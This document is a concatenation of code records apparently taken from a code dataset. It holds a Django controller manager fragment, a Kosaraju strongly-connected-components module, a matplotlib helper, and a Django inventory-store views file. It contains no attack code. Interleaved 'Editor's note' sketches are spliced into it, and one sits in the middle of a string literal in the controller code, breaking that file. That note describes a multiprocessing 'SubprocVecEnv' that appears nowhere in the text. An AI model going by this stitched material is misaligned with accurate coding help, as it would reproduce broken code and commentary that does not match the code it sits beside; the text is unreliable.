bundle_name, controller_name):\n bundle_path = cls._get_bundle_path(bundle_name)\n import_entry = \"from bundles.%s.controllers.%s import %s\\n\" % (bundle_name, controller_name.lower(),\n controller_name)\n\n controller_entry = \" (%s, \\\"/%s\\\", \\\"/%s/\\\"),\\n\" % (controller_name, controller_name.lower(),\n controller_name.lower().\n replace(\"controller.tem\", \"\"))\n\n with open(bundle_path + BUNDLE_SETTINGS, \"r\") as settings_file:\n new_lines = list()\n lines = settings_file.readlines()\n new_lines.append(import_entry)\n for line in lines:\n if \"CONTROLLERS = [\" in line:\n new_lines.append(\"CONTROLLERS = [\\n\" + 
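# --- Editor's note (illustrative sketch, not part of the original dataset) ---
# SubprocVecEnv above drives one worker process per environment over a Pipe,
# broadcasting commands and gathering replies. A self-contained toy version of
# that command/reply pattern follows; the worker body is a stand-in for the
# capture-the-flag environment, not part of the original module.
from multiprocessing import Process, Pipe

def toy_worker(remote):
    state = 0
    while True:
        cmd, data = remote.recv()
        if cmd == 'step':
            state += data
            remote.send(state)
        elif cmd == 'close':
            remote.close()
            break

if __name__ == '__main__':
    remotes, work_remotes = zip(*[Pipe() for _ in range(3)])
    procs = [Process(target=toy_worker, args=(wr,)) for wr in work_remotes]
    for p in procs:
        p.start()
    for r in remotes:                    # broadcast a command...
        r.send(('step', 2))
    print([r.recv() for r in remotes])   # ...then gather replies: [2, 2, 2]
    for r in remotes:
        r.send(('close', None))
    for p in procs:
        p.join()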
controller_entry)\n else:\n new_lines.append(line)\n\n with open(bundle_path + BUNDLE_SETTINGS, \"w\") as settings_file:\n settings_file.writelines(new_lines)\n\n @classmethod\n def _create_controller_file(cls, bundle_name, controller_name):\n bundle_path = cls._get_bundle_path(bundle_name)\n controller_file = open(bundle_path + CONTROLLER_PATH + controller_name.lower() + \".py\", \"w+\")\n with open(CONTROLLER_TEMPLATE_PATH, \"r\") as template_file:\n controller_file.write(template_file.read() % (bundle_name, controller_name, controller_name))\n controller_file.close()\n\n\n @staticmethod\n def _get_bundle_path(bundle_name):\n file_path = os.path.abspath((os.path.dirname(__file__) + BUNDLE_LOCATION + bundle_name))\n if not os.path.isdir(file_path):\n raise BundleDoesNotExistsError(bundle_name)\n return file_path","sub_path":"managers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"33513335","text":"from course_2.common.DirectedGraph import DirectedGraph\nfrom course_2.common.GraphCreator import create_graph_with_sccs\nfrom course_2.common.Vertex import Vertex\n\nnum_vertices_processed = 0 # t, used in dfs_loop first pass\ncurrent_source_vertex = None # s, used in dfs_loop second pass\n\n\ndef reverse_graph_edges(graph: DirectedGraph) -> DirectedGraph:\n \"\"\"\n Creates a copy of the input graph with all edges reversed\n :param graph: Input graph to make copy from\n :return: Reversed Graph\n \"\"\"\n reversed_graph = DirectedGraph()\n\n for vertex in graph.vertices:\n reversed_graph.add_vertex(vertex_id=vertex.id,\n finishing_time=vertex.finishing_time)\n\n for edge in graph.edges:\n reversed_graph.add_edge(edge_id=edge.id,\n head_id=edge.tail.id,\n tail_id=edge.head.id)\n\n return reversed_graph\n\n\ndef dfs_loop(graph: DirectedGraph):\n # Graph is sorted by finishing time increasing on second pass\n for vertex in graph.vertices:\n if not vertex.explored:\n global current_source_vertex\n current_source_vertex = vertex\n\n depth_first_search(vertex)\n\n return graph\n\n\ndef depth_first_search(vertex: Vertex):\n vertex.set_explored()\n\n global current_source_vertex\n vertex.leader = current_source_vertex\n\n for edge in vertex.edges:\n if not edge.head.explored:\n depth_first_search(edge.head)\n\n global num_vertices_processed\n num_vertices_processed = num_vertices_processed + 1\n\n vertex.finishing_time = num_vertices_processed\n\n\ndef compute_connectivity(graph: DirectedGraph):\n \"\"\"\n Implementation of Kosaraju's Two-Pass Algorithm to find strongly connected\n components (SCCs)\n - O(num_edges + num_vertices) time complexity\n - Performed using two depth-first searches.\n This will add a leader value for each vertex in the graph, vertices with\n the same leader are part of the same SCC\n :param graph:\n :return: graph with leaders in vertices\n \"\"\"\n reversed_graph = reverse_graph_edges(graph)\n reversed_graph = dfs_loop(reversed_graph)\n\n fixed_graph = reverse_graph_edges(reversed_graph)\n fixed_graph.sort_on_finishing_times()\n second_pass = dfs_loop(fixed_graph)\n\n return second_pass\n\n\nif __name__ == '__main__':\n directed_graph = create_graph_with_sccs()\n\n directed_graph = compute_connectivity(directed_graph)\n\n for vertex in directed_graph.vertices:\n print(f'Vertex {vertex.id} has leader 
{vertex.leader.id}')\n","sub_path":"course_2/depth_first_search/ComputeDirectedGraphConnectivity.py","file_name":"ComputeDirectedGraphConnectivity.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"6672914","text":"import matplotlib.pyplot as plt\n\nclass mplHelper:\n\t\"\"\"\n\tSilly little helper to set nice things about matplotlib plots so I don't have to type it every time.\n\t\"\"\"\n\t@classmethod\n\tdef initializeMpl(cls):\n\t\tparams = {'text.usetex': False, 'mathtext.fontset': 'dejavusans','font.size':14}\n\t\tplt.rcParams.update(params) \n\n\t@classmethod\n\tdef mySave(cls,flName):\n\t\tplt.savefig(flName,dpi=500,bbox_inches='tight')\n\n\t@classmethod\n\tdef hist1D(cls,thing,bins,range,weights,normed=True,save='histPlot'):\n\t\t\"\"\"\n\t\t@param thing:\n\t\t@param bins:\n\t\t@param range:\n\t\t@param weights:\n\t\t@param normed:\n\t\t@param save: String that, if empty, will just plot the figure, meaning you can plot more than one.\n\t\t\"\"\"\n\t\timport numpy as np\n\t\txx,yy = np.histogram(thing,bins=bins,range=range,weights=weights,density=normed)\n\t\txx = 0.5*(xx[1:]+xx[:-1])\n\t\tplt.plot(xx,yy,'k')\n\t\tif save:\n\t\t\tmplHelper.mySave(save)","sub_path":"mplHelper.py","file_name":"mplHelper.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"63945249","text":"from itertools import count\nimport json\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.db.models import Q\n# Create your views here.\nfrom main_store.models import ProductStore, ProductIssue, ProductCodeName, MaterialList, BinCardInfo, MaterialQuality, \\\n MrrIssue, QualityItemList, JobNumber, Indent, IndentMaterials\nfrom main_store.form import ProductIssueForm, ProductStoreForm, MaterialListForm, MrrIssueForm, MaterialQualityForm, \\\n QualityItemListForm, IndentForm, IndentMaterialsForm\nfrom datetime import date, datetime\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Create your views here.\n@login_required(login_url='login')\ndef home_store(request):\n user_name = \"প্রধান ভাণ্ডার\"\n context = {\n 'user_name': user_name,\n\n }\n return render(request, \"home/main_store.html\", context)\n\n\n@login_required(login_url='login')\ndef mrr_compose(request):\n submitted = False\n submitted1 = False\n target_item_query = None\n if request.method == 'POST':\n if '_save' in request.POST:\n mrr_no = request.POST.get('mrr_no')\n form = MaterialListForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted = True\n print(\"Data Save material list!\")\n target_item_query = MaterialList.objects.filter(Q(mrr_no=mrr_no))\n else:\n print('form not valid!')\n if request.method == 'POST':\n if '_save1' in request.POST:\n form = MrrIssueForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted1 = True\n print(\"Data Save in MRR Form.\")\n else:\n print('form not valid!')\n\n context = {\n 'target_item_query': target_item_query,\n 'submitted': submitted,\n 'submitted1': submitted1,\n }\n return render(request, \"main_store/mrr_form.html\", context)\n\n\ndef mrr_no_receive(request):\n if request.method == 'POST':\n if '_search' in request.POST:\n target_mrr_no = request.POST.get('mrr_no_search')\n print(target_mrr_no)\n return 
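# --- Editor's note (illustrative sketch, not part of the original dataset) ---
# The recursive depth_first_search in the Kosaraju record above can exceed
# Python's default recursion limit on large graphs. Below is an equivalent
# iterative DFS with an explicit stack, written over a plain adjacency list
# rather than the module's Vertex/Edge classes (the names here are
# assumptions introduced for illustration).
def iterative_dfs(adj, start, explored):
    order = []                                # vertices in finishing order
    stack = [(start, iter(adj[start]))]
    explored.add(start)
    while stack:
        v, neighbors = stack[-1]
        advanced = False
        for w in neighbors:
            if w not in explored:
                explored.add(w)
                stack.append((w, iter(adj[w])))
                advanced = True
                break
        if not advanced:
            stack.pop()
            order.append(v)                   # v finishes after its children
    return order

adj = {1: [2], 2: [3], 3: [1], 4: [3]}
print(iterative_dfs(adj, 4, set()))  # [2, 1, 3, 4]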
redirect('mrr_show', mrr_no=target_mrr_no)\n\n context = {\n\n }\n return render(request, \"main_store/mrr_search_form.html\", context)\n\n\ndef mrr_show(request, mrr_no):\n target_mrr_no = mrr_no\n target_mrr = MrrIssue.objects.get(mrr_no=target_mrr_no)\n target_material_list = MaterialList.objects.filter(mrr_no=target_mrr_no)\n context = {\n 'target_mrr': target_mrr,\n 'target_material_list': target_material_list,\n }\n return render(request, \"main_store/mrr_show.html\", context)\n\n\n# search using ajax start\ndef post_ajax(request):\n search = False\n if request.method == \"POST\":\n search_text = request.POST['search_text']\n search = True\n else:\n search_text = ''\n search_res = ProductStore.objects.filter(code=search_text)\n context = {\n 'search_res': search_res,\n 'search': search\n }\n return render(request, \"main_store/mrr_form.html\", context) # need output as render for csrf token show!\n\n\n# render_to_reponse did not show csrf token, need jquery min version not slim version. slim verson not working.\n\n\ndef ajax_search(request):\n search = False\n if request.is_ajax():\n search_text = request.POST['search_text']\n search = True\n else:\n search_text = ''\n search_res = ProductCodeName.objects.get(code=search_text)\n print(search_res)\n\n context = {\n 'search_res': search_res,\n 'search': search,\n }\n return render(request, 'main_store/ajax_search.html', context)\n\n\n# search using ajax end here...........\n\n\ndef job_number(request): # Job Number & name show in dropdown list.\n all_job = JobNumber.objects.all()\n job_nam = ''\n for job in all_job: # Add job Number after job name in job name row.\n if job.job_type == \"Repair\":\n job_no = job.job_no\n job_nam = job.job_name + \" \" + job_no\n job.job_name = job_nam\n job.save()\n print(job_nam)\n context = {\n 'all_job': all_job\n }\n return render(request, \"main_store/indent_form.html\", context)\n\n\n@login_required(login_url='login')\ndef product_issue(request):\n form = None\n popup = False\n submitted = False\n p_job = ''\n before_issue = ''\n balance_low = ''\n all_job = JobNumber.objects.all()\n if request.method == 'POST':\n if '_save' in request.POST:\n p_code = request.POST.get('item_code')\n p_job = request.POST.get('job_no')\n p_quantity = request.POST.get('item_quantity')\n form = ProductIssueForm(request.POST, request.FILES)\n target_item_query = BinCardInfo.objects.filter(Q(item_code=p_code))\n print(target_item_query)\n if target_item_query:\n if form.is_valid():\n instance = form.save(commit=False)\n for target_item in target_item_query:\n before_issue = target_item.balance\n print(target_item.balance)\n if float(before_issue) > 0 and float(before_issue) >= float(p_quantity):\n target_item.balance = float(target_item.balance) - float(p_quantity)\n target_item.save()\n after_issue = target_item.balance\n instance.qty_befr_issue = before_issue\n instance.qty_after_issue = after_issue\n instance.save()\n submitted = True\n print(\"Issue & deduction OK\")\n else:\n balance_low = \"This Product Not Available or product available but less than your\" \\\n \" requirement\"\n\n else:\n print(\"Form is not Valid\")\n\n else:\n popup = True\n print(\"Product not found\")\n context = {\n 'form': form,\n 'submitted': submitted,\n 'popup': popup,\n 'p_job': p_job,\n 'balance_low': balance_low,\n 'before_issue': before_issue,\n 'all_job': all_job\n }\n return render(request, \"main_store/product_issue_form.html\", context)\n\n\n@login_required(login_url='login')\ndef product_store(request):\n submitted = False\n 
error_msg = \"\"\n p_code = \"\"\n if request.method == 'POST':\n if '_save' in request.POST:\n p_code = request.POST.get('item_code')\n target_item_p_store = ProductStore.objects.filter(Q(item_code=p_code))\n # code.\n if target_item_p_store:\n error_msg = \"This Product Code Already Exits. Try new code!\"\n else:\n form = ProductStoreForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted = True\n print(\"Save is OK\")\n else:\n print(\"Form is not Valid\")\n # This code below for product save to product name and code table.\n form2 = ProductCodeName()\n try:\n target_item_p_name = ProductCodeName.objects.get(Q(code=p_code)) # Item Target in Product name &\n if target_item_p_name:\n target_item_p_name.location = request.POST.get('item_location')\n target_item_p_name.min_balance = request.POST.get('min_balance')\n target_item_p_name.item_picture = request.FILES.get('item_picture')\n target_item_p_name.save()\n except ObjectDoesNotExist:\n form2.code = request.POST.get('item_code')\n form2.name = request.POST.get('item_name')\n form2.item_unit = request.POST.get('item_unit')\n form2.location = request.POST.get('item_location')\n form2.min_balance = request.POST.get('min_balance')\n form2.item_picture = request.FILES.get('item_picture')\n form2.item_under_group = request.POST.get('item_group')\n form2.save()\n print(\"Product Name and code save.\")\n # Bin Card table data inserted here...\n bincard_form = BinCardInfo()\n bincard_form.ref_no = request.POST.get('ref_no')\n bincard_form.item_code = request.POST.get('item_code')\n bincard_form.item_name = request.POST.get('item_name')\n bincard_form.date = request.POST.get('buy_onDate')\n bincard_form.job_no = request.POST.get('buy_underJob')\n bincard_form.entry_qty = request.POST.get('item_quantity')\n # bincard_form.issued_qty = request.POST.get('buy_onDate')\n bincard_form.receiver = request.POST.get('item_user')\n bincard_form.balance = request.POST.get('item_quantity')\n bincard_form.min_balance = request.POST.get('min_balance')\n bincard_form.item_unit = request.POST.get('item_unit')\n bincard_form.save()\n print(\"Bin Card Save!\")\n context = {\n 'submitted': submitted,\n 'error_msg': error_msg,\n 'p_code': p_code\n\n }\n return render(request, \"main_store/product_store_form.html\", context)\n\n\n@login_required(login_url='login')\ndef existing_product_store(request):\n submitted = False\n error_msg = \"\"\n p_code = \"\"\n p_job_no = \"\"\n p_min_balance = ''\n if request.method == 'POST':\n if '_save' in request.POST:\n p_code = request.POST.get('item_code')\n p_job_no = request.POST.get('buy_underJob')\n p_code_error = ProductStore.objects.filter(Q(item_code=p_code)) # Q(buy_underJob=p_job_no)\n if not p_code_error:\n error_msg = \": This Product Code is not registered. 
Try with registered Product Code or \" \\\n \"Registration by new entry.\"\n else:\n # these request come from template.\n form = ProductStore()\n form.item_code = p_code\n form.item_name = request.POST.get('item_name')\n form.item_quantity = request.POST.get('item_quantity')\n form.item_unit = request.POST.get('item_unit')\n form.ref_no = request.POST.get('ref_no')\n form.buy_onDate = request.POST.get('buy_onDate')\n form.buy_underJob = p_job_no\n form.item_user = request.POST.get('item_user')\n exp_date = request.POST.get('expire_date')\n if exp_date:\n form.expire_date = exp_date\n form.recorder = request.POST.get('recorder')\n\n # request come from name & code table.\n auto_input = ProductCodeName.objects.get(Q(code=p_code))\n form.item_location = auto_input.location\n p_min_balance = auto_input.min_balance\n form.min_balance = p_min_balance\n form.item_picture = auto_input.item_picture\n form.save()\n print(\"Existing Form Save!\")\n\n update_product = BinCardInfo.objects.filter(Q(item_code=p_code)) #\n if update_product:\n # Bin Card table data update here...\n bincard_balance = request.POST.get('item_quantity')\n bincard_date = request.POST.get('buy_onDate')\n bincard_ref_no = request.POST.get('ref_no')\n received_shop = request.POST.get('item_user')\n target_item_query = BinCardInfo.objects.filter(Q(item_code=p_code))\n if target_item_query:\n for target_item in target_item_query:\n target_item.balance = float(target_item.balance) + float(bincard_balance)\n target_item.date = bincard_date\n target_item.ref_no = bincard_ref_no\n target_item.entry_qty = bincard_balance\n target_item.save()\n submitted = True\n print(\"Bin Card Updated!\")\n else:\n # Bin Card table data inserted here ...\n bincard_form = BinCardInfo()\n bincard_form.ref_no = request.POST.get('ref_no')\n bincard_form.item_code = p_code\n bincard_form.item_name = request.POST.get('item_name')\n bincard_form.date = request.POST.get('buy_onDate')\n bincard_form.job_no = p_job_no\n bincard_form.entry_qty = request.POST.get('item_quantity')\n # bincard_form.issued_qty = request.POST.get('buy_onDate')\n bincard_form.receiver = request.POST.get('item_user')\n bincard_form.balance = request.POST.get('item_quantity')\n bincard_form.min_balance = p_min_balance\n bincard_form.item_unit = request.POST.get('item_unit')\n bincard_form.save()\n print(\"Bin Card Save!\")\n context = {\n 'submitted': submitted,\n 'error_msg': error_msg,\n 'p_code': p_code,\n 'p_job_no': p_job_no\n\n }\n return render(request, \"main_store/Existing_product_store_form.html\", context)\n\n\ndef bin_card_state(request):\n search_item_query = None\n total = 0\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n search_item_query = ProductStore.objects.filter(Q(item_code=p_code) | Q(item_name__icontains=p_code) |\n Q(item_quantity=p_code) | Q(item_location=p_code) |\n Q(buy_underJob=p_code))\n for search_item in search_item_query:\n total = total + int(search_item.item_quantity)\n\n context = {\n 'search_item_query': search_item_query,\n 'total': total,\n\n }\n return render(request, \"main_store/bin_card_state.html\", context)\n\n\ndef issuer_state(request):\n search_query_set = None\n total_issue = 0\n item_unit = ''\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n search_query_set = ProductIssue.objects.filter(Q(sr_no=p_code) | Q(job_no=p_code) |\n Q(received_shop=p_code) | Q(item_code=p_code) |\n Q(item_name__icontains=p_code) | 
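# --- Editor's note (hedged sketch, not part of the original dataset) ---
# The report views in this file total quantities by looping and calling
# float(), which suggests the quantity columns may be stored as text. If they
# were numeric model fields, the database could aggregate directly; the helper
# name below is an assumption introduced here, and ProductIssue is the model
# already imported at the top of this views.py.
from django.db.models import Q, Sum

def issue_total(p_code):
    qs = ProductIssue.objects.filter(Q(item_code=p_code) | Q(job_no=p_code))
    return qs.aggregate(total=Sum('item_quantity'))['total'] or 0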
Q(item_quantity=p_code))\n\n for item_wise in search_query_set:\n total_issue = float(total_issue) + float(item_wise.item_quantity)\n item_unit = item_wise.item_unit \n context = {\n 'search_query_set': search_query_set,\n 'total_issue': total_issue,\n 'item_unit': item_unit\n\n }\n return render(request, \"main_store/bin_card_issuer.html\", context)\n\n\ndef purchase_state(request):\n search_query_set = None\n total_purchase = 0\n item_unit = ''\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n search_query_set = ProductStore.objects.filter(Q(ref_no=p_code) | Q(buy_underJob=p_code)\n | Q(item_code=p_code) | Q(item_name__icontains=p_code) |\n Q(item_user__icontains=p_code))\n for item_wise in search_query_set:\n total_purchase = float(total_purchase) + float(item_wise.item_quantity)\n item_unit = item_wise.item_unit \n context = {\n 'search_query_set': search_query_set,\n 'total_purchase': total_purchase,\n 'item_unit': item_unit\n\n }\n return render(request, \"main_store/store_state.html\", context)\n\n\ndef product_name_code(request):\n search_query_set = \"\"\n sl_no = 0\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n group_name = request.POST.get('group_name')\n if p_code and not group_name:\n search_query_set = ProductCodeName.objects.filter(Q(name__icontains=p_code) | Q(code__icontains=p_code)\n | Q(location__icontains=p_code))\n print(\"Search\")\n elif group_name and not p_code:\n search_query_set = ProductCodeName.objects.filter(Q(item_under_group=group_name))\n print(\"Group Name\")\n elif group_name and p_code:\n search_query_set = ProductCodeName.objects.filter((Q(name__icontains=p_code) | Q(code__icontains=p_code)\n | Q(location__icontains=p_code)) &\n Q(item_under_group=group_name))\n print(\"Group Name & search\")\n context = {\n 'search_query_set': search_query_set,\n\n }\n return render(request, 'main_store/product_code_name.html', context)\n\n\ndef low_balance_state(request):\n min_balance_list = []\n min_balance_filter = []\n search_query_set = BinCardInfo.objects.all()\n for search_query in search_query_set:\n if search_query.min_balance:\n if float(search_query.min_balance) >= float(search_query.balance):\n min_balance_list.append(search_query)\n if request.method == 'POST':\n if '_search' in request.POST:\n search_key = request.POST.get('search')\n search_query_filter = ProductStore.objects.filter(\n Q(item_code=search_key) | Q(item_name__icontains=search_key) |\n Q(job_no__icontains=search_key))\n for search_filter in search_query_filter:\n if search_filter.min_balance and search_filter.item_quantity:\n if float(search_filter.min_balance) >= float(search_filter.item_quantity):\n min_balance_filter.append(search_filter)\n context = {\n 'min_balance_filter': min_balance_filter,\n 'min_balance_list': min_balance_list,\n\n }\n return render(request, 'main_store/low_balance.html', context)\n\n\ndef expire_date_state(request):\n current_date = date.today()\n p_code = '112211'\n expired_list = []\n expired_list_filter = []\n diff = ''\n search_query_set = ProductStore.objects.all()\n for search_query in search_query_set:\n last_date = search_query.expire_date\n if last_date:\n diff = last_date - current_date\n if diff.days < 60:\n expired_list.append(search_query)\n if request.method == 'POST':\n if '_search' in request.POST:\n search_key = request.POST.get('search')\n search_query_filter = ProductStore.objects.filter(\n Q(item_code=search_key) | 
Q(item_name__icontains=search_key) |\n Q(buy_underJob=search_key) | Q(item_user__icontains=search_key))\n for search_filter in search_query_filter:\n last_date = search_filter.expire_date\n diff = (last_date - current_date)\n if diff.days < 60:\n expired_list_filter.append(search_filter)\n print(expired_list)\n context = {\n 'expired_list': expired_list,\n 'expired_list_filter': expired_list_filter,\n\n }\n return render(request, 'main_store/expire_date_list.html', context)\n\n\n# Auto Complete Function for show Product Code from Product CodeName Table.\ndef autocomplete(request):\n if 'term' in request.GET:\n qs = ProductCodeName.objects.filter(code__icontains=request.GET.get('term'))\n titles = list()\n for product_name in qs:\n titles.append(product_name.code)\n return JsonResponse(titles, safe=False)\n return render(request, 'main_store/Existing_product_store_form.html')\n\n\n# Auto Complete Function for show Product Job Number from Product Store Table.\ndef autocomplete_job_no(request):\n if 'term' in request.GET:\n qs = ProductStore.objects.filter(buy_underJob__icontains=request.GET.get('term'))\n job_no = list()\n for product_job in qs:\n job_no.append(product_job.buy_underJob)\n return JsonResponse(job_no, safe=False)\n return render(request, 'main_store/Existing_product_store_form.html')\n\n\ndef material_balance_state(request):\n search_query_set = None\n total = 0\n unit = ''\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n search_query_set = BinCardInfo.objects.filter(Q(ref_no=p_code) | Q(job_no=p_code)\n | Q(item_code=p_code) | Q(item_name__icontains=p_code))\n for search_item in search_query_set:\n total = total + float(search_item.balance)\n unit = search_item.item_unit\n context = {\n 'search_query_set': search_query_set,\n 'total': total,\n 'unit': unit\n }\n return render(request, 'main_store/mat_balance_state.html', context)\n\n\ndef quality_receive(request):\n if request.method == 'POST':\n if '_search' in request.POST:\n target_quality_no = request.POST.get('quality_no_search')\n print(target_quality_no)\n return redirect('material_quality', quality_no=target_quality_no)\n\n context = {\n\n }\n return render(request, \"main_store/quality_no_search_form.html\", context)\n\n\ndef material_quality(request, quality_no):\n # .get() raises DoesNotExist for an unknown quality number; .first() returns None instead,\n # so the not-found branch below is actually reachable\n quality_data = MaterialQuality.objects.filter(Q(quality_no=quality_no)).first()\n quality_item = QualityItemList.objects.filter(Q(quality_no=quality_no))\n if quality_data and quality_item:\n context = {\n \"quality_data\": quality_data,\n \"quality_item\": quality_item,\n }\n return render(request, 'main_store/quality_form.html', context)\n else:\n error_msg = 'Search Item Not Found'\n context = {\n 'error_msg': error_msg,\n }\n return render(request, 'main_store/quality_no_search_form.html', context)\n\n\ndef quality_input(request):\n target_item_query = ''\n submitted = ''\n submitted1 = ''\n form1 = MaterialQualityForm()\n if request.method == 'POST':\n if '_save1' in request.POST:\n quality_no = request.POST.get('quality_no')\n form = QualityItemListForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted1 = True\n print(\"Data Save Quality Item list!\")\n target_item_query = QualityItemList.objects.filter(Q(quality_no=quality_no))\n else:\n print('form not valid!')\n if request.method == 'POST':\n if '_save' in request.POST:\n form = MaterialQualityForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted = True\n print(\"Quality Report Submitted\")\n 
else:\n print(\"Form Not Valid\")\n context = {\n \"form1\": form1,\n 'target_item_query': target_item_query,\n 'submitted': submitted,\n 'submitted1': submitted1,\n }\n return render(request, 'main_store/quality_form_input.html', context)\n\n\ndef gate_pass(request):\n bincard_form = BinCardInfo()\n return render(request, 'main_store/gate_pass.html')\n\n\ndef sr_form(request):\n bincard_form = BinCardInfo()\n return render(request, 'main_store/sr_form.html')\n\n\ndef project_detail_store(request):\n user_name = \"প্রধান ভাণ্ডার\"\n context = {\n 'user_name': user_name,\n\n }\n return render(request, 'main_store/project-details_store.html', context)\n\n\ndef statement(request):\n total_buy = 0\n total_issue = 0\n if request.method == 'POST':\n start_date = request.POST.get('start_date')\n end_date = request.POST.get('end_date')\n product_name = request.POST.get('item_code') # receive product code from post method.\n p_job_name = request.POST.get('item_job_no')\n if p_job_name and product_name:\n purchase_info = ProductStore.objects.filter(Q(buy_underJob=p_job_name) & Q(item_code=product_name)\n & Q(buy_onDate__range=[start_date, end_date]))\n elif p_job_name and not product_name:\n purchase_info = ProductStore.objects.filter(Q(buy_underJob=p_job_name) &\n Q(buy_onDate__range=[start_date, end_date]))\n else:\n purchase_info = ProductStore.objects.filter(Q(item_code=product_name) &\n Q(buy_onDate__range=[start_date, end_date]))\n if purchase_info:\n for item_buy in purchase_info:\n total_buy = total_buy + float(item_buy.item_quantity)\n print(purchase_info)\n print(total_buy)\n if p_job_name and product_name:\n issue_info = ProductIssue.objects.filter(Q(job_no=p_job_name) & Q(item_code=product_name) &\n Q(date__range=[start_date, end_date]))\n elif p_job_name and not product_name:\n issue_info = ProductIssue.objects.filter(Q(job_no=p_job_name) &\n Q(date__range=[start_date, end_date]))\n else:\n issue_info = ProductIssue.objects.filter(Q(item_code=product_name) & Q(date__range=[start_date, end_date]))\n if issue_info:\n for item_issue in issue_info:\n total_issue = total_issue + float(item_issue.item_quantity)\n print(issue_info)\n print(total_issue)\n context = {\n 'purchase_info': purchase_info,\n 'issue_info': issue_info,\n 'total_issue': total_issue,\n 'total_buy': total_buy,\n 'start_date': start_date,\n 'end_date': end_date,\n }\n return render(request, 'main_store/statement.html', context)\n context = {\n\n }\n return render(request, 'main_store/statement.html', context)\n\n\n# Demo Product Code and Name from xlsc/Excel file.\nfrom main_store.models import DemoNameCode, DemoJobNumber\nfrom django.db.models import Count\nimport xlrd\nimport os\n\n\ndef demo_code_input(request):\n module_dir = os.path.dirname(__file__) # set file location. 
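# --- Editor's note (hedged sketch, not part of the original dataset) ---
# The demo_code_input view here reads an .xlsx file with xlrd; xlrd 2.0+
# dropped .xlsx support, so on a modern install openpyxl is the usual
# replacement. Using openpyxl is an assumption -- the project may simply pin
# xlrd < 2. The file name and column layout are taken from the view itself.
import os
from openpyxl import load_workbook

module_dir = os.path.dirname(__file__)
wb = load_workbook(os.path.join(module_dir, '01 Hardware_microsoft.xlsx'),
                   read_only=True)
sheet = wb.worksheets[0]
for row in sheet.iter_rows(values_only=True):
    name, code, unit, group = row[:4]  # same column order the view's loop assumes
    print(name, code, unit, group)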
file located in main_store app folder\n file = os.path.join(module_dir, '01 Hardware_microsoft.xlsx') # set file location in django\n workbook = xlrd.open_workbook(file)\n print(workbook)\n sheet = workbook.sheet_by_index(0)\n for row in range(sheet.nrows):\n print(\"--------------------------\")\n obj_name_code = DemoNameCode()\n for col in range(sheet.ncols):\n if col == 0:\n print(\"Name: \", sheet.cell_value(row, col))\n obj_name_code.p_name = sheet.cell_value(row, col)\n elif col == 1:\n print(\"Code: \", sheet.cell_value(row, col))\n obj_name_code.p_code = sheet.cell_value(row, col)\n elif col == 2:\n print(\"Unit: \", sheet.cell_value(row, col))\n obj_name_code.p_unit = sheet.cell_value(row, col)\n elif col == 3:\n print(\"Item_under_group: \", sheet.cell_value(row, col))\n obj_name_code.item_under_group = sheet.cell_value(row, col)\n obj_name_code.save()\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef demo_job_name(request): # Job Number import from demo Excel file.\n module_dir = os.path.dirname(__file__) # set file location. file located in main_store app folder\n file = os.path.join(module_dir, '09Job Name.xlsx') # set file location in django\n workbook = xlrd.open_workbook(file)\n print(workbook)\n sheet = workbook.sheet_by_index(0)\n for row in range(sheet.nrows):\n print(\"--------------------------\")\n obj_job_name = DemoJobNumber()\n for col in range(sheet.ncols):\n if col == 0:\n print(\"Job No: \", sheet.cell_value(row, col))\n obj_job_name.job_no = sheet.cell_value(row, col)\n elif col == 1:\n print(\"Job Name: \", sheet.cell_value(row, col))\n obj_job_name.job_name = sheet.cell_value(row, col)\n elif col == 2:\n print(\"Job Type: \", sheet.cell_value(row, col))\n obj_job_name.job_type = sheet.cell_value(row, col)\n obj_job_name.save()\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef demo_job_name_delete(request): # Delete all Job Number in demo job name database.\n demo_job_no = DemoJobNumber.objects.all()\n demo_job_no.delete()\n context = {\n # 'demo_name': demo_name,\n }\n return render(request, 'main_store/demo_code_show.html', context)\n\n\ndef job_no_store(request): # Job Number import from demo job name database.\n job_no_dict = DemoJobNumber.objects.all()\n for job_no in job_no_dict:\n form2 = JobNumber()\n print(\"--------------------------\")\n form2.job_no = job_no.job_no\n print(\"Job No\", job_no.job_no)\n form2.job_name = job_no.job_name\n print(\"Job Name\", job_no.job_name)\n form2.job_type = job_no.job_type\n print(\"Job Type\", job_no.job_type)\n form2.save()\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef demo_code_show(request):\n demo_name = DemoNameCode.objects.all()\n context = {\n 'demo_name': demo_name,\n }\n return render(request, 'main_store/demo_code_show.html', context)\n\n\n# def demo_code_delete(request):\n# demo_name = DemoNameCode.objects.filter(Q(p_code=\" \"))\n# for name in demo_name:\n# print(name.p_name)\n# context = {\n# 'demo_name': demo_name,\n# }\n# return render(request, 'main_store/demo_code_show.html', context)\n\ndef duplicate_in_demo_code(request): # find and delete duplicate item name and code from database.\n dupes = DemoNameCode.objects.values('p_name').annotate(Count('id')).order_by().filter(id__count__gt=1)\n records = DemoNameCode.objects.filter(p_name__in=[item['p_name'] for item in dupes])\n print(records)\n records.delete()\n demo_name = DemoNameCode.objects.all() # remaining rows after removing duplicates\n context = {\n 'demo_name': demo_name,\n }\n return render(request, 'main_store/demo_code_show.html', context)\n\n\ndef
